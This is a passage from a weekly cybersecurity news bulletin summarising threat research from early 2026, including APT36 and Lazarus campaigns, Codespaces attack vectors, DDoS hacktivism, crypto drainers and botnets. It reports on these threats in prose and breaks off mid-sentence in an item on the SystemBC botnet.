ThreatsDay Bulletin: Codespaces RCE, AsyncRAT C2, BYOVD Abuse, AI Cloud Intrusions & 15+ Stories  Ravie Lakshmanan  Feb 05, 2026 Cybersecurity / Hacking News This week didn’t produce one big headline. It produced many small signals — the kind that quietly shape what attacks will look like next. Researchers tracked intrusions that start in ordinary places: developer workflows, remote tools, cloud access, identity paths, and even routine user actions. Nothing looked dramatic on the surface. That’s the point. Entry is becoming less visible while impact scales later. Several findings also show how attackers are industrializing their work — shared infrastructure, repeatable playbooks, rented access, and affiliate-style ecosystems. Operations are no longer isolated campaigns. They run more like services. This edition pulls those fragments together — short, precise updates that show where techniques are maturing, where exposure is widening, and what patterns are forming behind the noise. Startup espionage expansion Operation Nomad Leopard Targets Afghanistan In a sign that the threat actor has moved beyond government targets, the Pakistan-aligned APT36 threat actor has been observed targeting India's startup ecosystem, using ISO files and malicious LNK shortcuts using sensitive, startup-themed lures to deliver Crimson RAT , enabling comprehensive surveillance, data exfiltration, and system reconnaissance. The initial access vector is a spear-phishing email carrying an ISO image. Once executed, the ISO contains a malicious shortcut file and a folder holding three files: a decoy document, a batch script that acts as the persistence mechanism, and the final Crimson RAT payload, disguised as an executable named Excel. "Despite this expansion, the campaign remains closely aligned with Transparent Tribe's historical focus on Indian government and defense-adjacent intelligence collection, with overlap suggesting that startup-linked individuals may be targeted for their proximity to government, law enforcement, or security operations," Acronis said . Shared cybercrime infrastructure ShadowSyndicate Levels Up with New Tactics The threat activity cluster known as ShadowSyndicate has been linked to two additional SSH markers that connect dozens of servers to the same cybercrime operator. These hosts are then used for a wide range of malicious activities by various threat clusters linked to Cl0p, BlackCat, Ryuk, Malsmoke, and Black Basta. A notable finding is that the threat actor tends to transfer servers between their SSH clusters. ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel. "The threat actor tends to reuse previously employed infrastructure, sometimes rotating various SSH keys across their servers," Group-IB said . "If such a technique is performed correctly, the infrastructure is transferred subsequently, much like in a legitimate scenario, when a server goes to a new user." Ransomware KEV expansion CISA Marks 59 CVEs as Exploited in Ransomware Attacks The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has tweaked 59 actively exploited vulnerability notices in 2025 to reflect their use by ransomware groups. That list includes 16 entries for Microsoft, six for Ivanti, five for Fortinet, three for Palo Alto Networks, and three for Zimbra. "When it flips from 'Unknown' to 'Known,' reassess, especially if you've been deprioritizing that patch because 'it's not ransomware-related yet," GreyNoise's Glenn Thorpe said . Espionage and DDoS arrests Polish Authorities Detain Two People Polish authorities have detained a 60-year-old employee of the country's defense ministry on suspicion of spying for a foreign intelligence agency. The suspect worked in the Ministry of National Defense’s strategy and planning department, including on military modernization projects, officials said. While the name of the country was not revealed, Polish state officials told local media that the suspect had worked with Russian and Belarusian intelligence services. In a related development, Poland's Central Bureau for Combating Cybercrime (CBZC) said a 20-year-old man has been arrested for allegedly conducting distributed denial-of-service (DDoS) attacks on high-profile websites, including those of strategic importance. The individual faces six charges and a potential five-year prison sentence. Codespaces RCE vectors Supply-Chain Attack Vectors in GitHub Codespaces Multiple attack vectors have been disclosed in GitHub Codespaces that allow remote code execution simply by opening a malicious repository or pull request. The identified vectors include: (1) .vscode/settings.json with PROMPT_COMMAND injection, (2) .devcontainer/devcontainer.json with postCreateCommand injection, and (3) .vscode/tasks.json with folderOpen auto-run tasks. "By abusing VSCode-integrated configuration files that Codespaces automatically respects, an adversary can execute arbitrary commands, exfiltrate GitHub tokens and secrets, and even abuse hidden APIs to access premium Copilot models," Orca Security researcher Roi Nisimi said . Microsoft has deemed the behavior to be by design. Nordic finance targeting Lazarus Group Linked to New Campaign Targeting the Nordics The financial sector in the Nordics has been targeted by the North Korea-linked Lazarus Group as part of a long-running campaign dubbed Contagious Interview that drops a stealer and downloads a named BeaverTail. "BeaverTail contains functionality that will automatically search the victim's machine for cryptocurrency-related data, but can also be used as a remote access tool for further attacks," TRUESEC said. Volunteer DDoS force NoName057(16) and DDoSia Project Detailed In a new analysis, SOCRadar said the pro-Russian hacktivist outfit known as NoName057(16) is using a volunteer-distributed DDoS weapon called DDoSia Project to disrupt government, media, and institutional websites tied to Ukraine and Western political interests. Through active Telegram channels with over 20,000 followers, the group frames the disruptive (but non-destructive) attacks as "self-defense" against Western aggression and provides real-time evidence of successful disruptions. Its ideologically driven campaigns often coincide with major geopolitical events, countering sanctions and military aid announcements with retaliatory cyber attacks. "Unlike traditional botnets that compromise systems without user knowledge, DDoSia operates on a disturbing premise: thousands of willing participants knowingly install the tool and coordinate attacks against targets designated by the group's operators," SOCRadar said . "Through propaganda, gamification, and cryptocurrency rewards, NoName057(16) has built a distributed attack force that requires minimal technical skill to join, yet demonstrates remarkable operational sophistication." According to Censys , targeting of the purpose-built tool is heavily focused on Ukraine, European allies, and NATO states in government, military, transportation, public utilities, financial, and tourism sectors. Affiliate crypto drainers Rublevka Team, a Russian Crypto Drainer Operation A major cybercriminal operation dubbed Rublevka Team specializes in large-scale cryptocurrency theft since its inception in 2023, generating over $10 million through affiliate-driven wallet draining campaigns. "Rublevka Team is an example of a 'traffer team,' composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages," Recorded Future said . "Unlike traditional malware-based approaches such as those used by the trafficker teams Markopolo and Crazy Evil , Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions." Rublevka Team offers affiliates access to fully automated Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. This further lowers the technical barrier to entry, allowing the threat actors to build an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight. Rublevka Team's primary Telegram channel has approximately 7,000 members to date. TLS deprecation deadline Microsoft Urges Migration to TLS 1.2 for Azure Blob Storage Microsoft is urging customers to secure their infrastructure with Transport Layer Security (TLS) version 1.2 for Azure Blob Storage, and remove dependencies on TLS version 1.0 and 1.1. "On February 3, 2026, Azure Blob Storage will stop supporting versions 1.0 and 1.1 of Transport Layer Security (TLS)," Microsoft said . "TLS 1.2 will become the new minimum TLS version. This change impacts all existing and new blob storage accounts, using TLS 1.0 and 1.1 in all clouds. Storage accounts already using TLS 1.2 aren't impacted by this change." Voicemail social engineering German-Language Voicemail Lure Leads to Remote Access In a new campaign, fake voicemail messages with bank-themed subdomains have been found to direct targets to a convincing "listen to your message" experience that's designed to look routine and trustworthy. In reality, the attack leads to the deployment of Remotely RMM, a legitimate remote access software, that enrolls the victim system into an attacker-controlled environment to enable persistent remote access and management. "The flow relies on social engineering rather than exploits, using lures to persuade users to approve installation steps," Censys said . "The end goal is installation of an RMM (remote monitoring and management) tool, enrolling the device into an attacker-controlled environment." Global proxy botnet SystemBC Botnet Has Over 10K Infected IPs A long-running malware operation known as SystemBC (aka Coroxy or DroxiDat) has been tied to more than 10,000 infected IP addre